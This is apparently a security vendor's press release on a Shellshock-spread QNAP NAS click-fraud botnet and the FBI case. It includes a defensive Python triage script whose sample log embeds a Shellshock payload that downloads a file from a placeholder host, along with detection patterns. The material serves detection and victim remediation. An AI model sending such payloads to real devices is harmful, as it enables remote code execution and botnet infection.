Forkbombus Labs Assists FBI in Click Fraud Botnet Disruption

On August 4th, 2017, Fabio Gasperini, an Italian citizen, was found guilty by jury trial on one charge of Computer Intrusion for his involvement in the orchestration and propagation of a global botnet used to perform click fraud activity. Forkbombus Labs is proud to announce its pivotal role in the discovery and investigation of the botnet and click fraud activity. “Forkbombus Labs is committed not only to providing immediate defenses, but to working with the global law enforcement community to enable and ensure long term remediation of cyber criminal activity. We take great pride in our role in the disruption and discontinuation of these malicious acts - as well as the identification and apprehension of the suspected parties.” said James Ward, CEO and Co-Founder of Forkbombus Labs.

The Click Fraud Botnet

On December 5th, 2014, Forkbombus Labs was alerted by its Hivemind technology to a new botnet being propagated through the Shellshock vulnerability (CVE-2014-6271), specifically targeting QNAP NAS devices whose web interface was reachable from the public internet on TCP port 80. Analysis of these attacks showed that the ultimate motivation was advertisement click fraud. Beyond the click fraud itself, the malicious code served several purposes, including but not limited to:

  • Adding a backdoor administrator user account.
  • Creating a publicly accessible, unauthenticated webshell.
  • Configuring an SSH daemon listening on port 26.
  • Patching the infected QNAP NAS device against the Shellshock vulnerability, preventing further exploitation (this locks out rival bots and also means a later vulnerability scan reports the device as patched).
  • Downloading and executing a Lightaidra IRC bot.
  • Further, worm-like, botnet propagation.
  • Visiting advertisements in a fraudulent manner meant to emulate legitimate human activity.
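The indicators above are enough for a first-pass triage. The following Python script is an added example, not code from the Forkbombus report or from QNAP: it scans captured web server log lines for Shellshock (CVE-2014-6271) probe patterns and audits copied `/etc/passwd` and `netstat -tln` output for the post-infection indicators listed (an extra UID 0 account, an SSH listener on port 26). All sample inputs are constructed for the example; the built-in account name `admin` and the port list are assumptions to adjust for your firmware.

```python
"""Offline triage for the QNAP click-fraud botnet indicators described above.

Added example (not from the original report). Inputs are text captured from
the device or its front-end proxy, so this can run on an analyst workstation
without touching the NAS. Sample data below is constructed.
"""
import re

# A Shellshock probe places a bash function definition followed by a command
# into an HTTP header (typically User-Agent) that a CGI handler exports into
# the environment of a bash child process, e.g. "() { :;}; <command>".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed Apache-style access log lines (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [05/Dec/2014:10:15:32 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/sh -c 'wget http://198.51.100.9/x -O /tmp/x'"
192.0.2.44 - - [05/Dec/2014:10:15:40 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Constructed /etc/passwd excerpt: 'admin' is the stock UID 0 account
# (assumption), 'backup_svc' is a made-up backdoor account for the example.
SAMPLE_PASSWD = """\
admin:x:0:0:administrator:/share/homes/admin:/bin/sh
httpdusr:x:1000:1000::/share/homes/httpdusr:/bin/sh
backup_svc:x:0:0::/tmp:/bin/sh
"""

# Constructed `netstat -tln` output showing the extra SSH daemon on port 26.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:26              0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
"""


def shellshock_hits(log_text):
    """Return (client_ip, payload) for each log line carrying a Shellshock pattern."""
    hits = []
    for line in log_text.splitlines():
        m = SHELLSHOCK_RE.search(line)
        if m:
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, line[m.start():].rstrip('"')))
    return hits


def extra_root_accounts(passwd_text, expected=("admin",)):
    """UID 0 accounts other than those expected on a stock device.

    `expected` is an assumption: compare against a known-good passwd from the
    same firmware version rather than trusting this default.
    """
    found = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] not in expected:
            found.append(parts[0])
    return found


def unexpected_listeners(netstat_text, suspicious_ports=(26,)):
    """TCP listeners on ports matching the botnet's SSH-on-26 indicator."""
    found = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 4 or not cols[0].startswith("tcp"):
            continue
        local_addr = cols[3]
        port = int(local_addr.rsplit(":", 1)[1])
        if port in suspicious_ports:
            found.append((local_addr, port))
    return found


def triage(log_text, passwd_text, netstat_text):
    """Combine the checks. Note: because the malware patches Shellshock on the
    device, a negative Shellshock scan does not clear it; the host-side
    indicators are what matter."""
    report = {
        "shellshock_probes": shellshock_hits(log_text),
        "extra_root_accounts": extra_root_accounts(passwd_text),
        "suspicious_listeners": unexpected_listeners(netstat_text),
    }
    report["likely_infected"] = bool(
        report["extra_root_accounts"] or report["suspicious_listeners"]
    )
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG, SAMPLE_PASSWD, SAMPLE_NETSTAT).items():
        print(f"{key}: {value}")
```

Run it against real captures by replacing the constructed strings with the contents of your front-end access log, the device's `/etc/passwd`, and `netstat -tln` output. The script does not look for the webshell because the report excerpt above does not name its path; compare the web root against a clean firmware image for that.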

“Our researchers quickly identified long-standing related activity and the motivation behind these attacks. This allowed our users to quickly identify the appropriate response for this activity and their needs. Through our combined efforts with the FBI, we were able to engage in root cause remediation of this activity, preventing millions of attacks from affecting our clients and the internet as a whole.” said Stu Gorton, Chief Science Officer and Co-Founder of Forkbombus Labs.

The full report may be found here.

Victim Resources

QNAP NAS devices that were susceptible to the Shellshock vulnerability and reachable from the public internet on port 80 may be infected. Because the malware patches the device against Shellshock after infection, a vulnerability scan that now reports the device as patched does not mean it is clean; look instead for the post-infection indicators above (an SSH daemon on port 26, an additional administrator account, an unauthenticated webshell). Using its Hivemind technology, Forkbombus Labs has identified over 2,500 infected QNAP NAS devices in more than 70 countries. If you suspect you may be a victim of the aforementioned QNAP NAS botnet, or of other cyber criminal activity, please contact Forkbombus Labs at [email protected].

Hivemind Intelligent Deception

Hivemind is Forkbombus Labs’ patent-pending, A.I.-driven deception technology. Standard honeypots and deception technologies imitate a predetermined service or environment. This becomes problematic because attackers’ capabilities and interests often differ from what a static deception offers: even when attackers stumble upon a static honeypot, they frequently ignore it in favour of targets that match what they are looking for. When attackers fail to engage with deception technology, defenders fail to gain the intelligence that would enable an informed response to the attack.

As Hivemind learns an attacker’s capabilities and motivations, Hivemind sensors alter their appearance to each attacker in real time to emulate whatever that attacker is most likely to interact with. This makes attackers more likely to engage the sensors, and in doing so to divulge as much information as possible about themselves and their intentions. The enhanced collection capability enables defenders to rapidly identify an attacker’s resources, motivations, and identity, and to respond to threats faster and more intelligently than before. Attackers who engage with Hivemind raise their own costs while saving defenders time and money.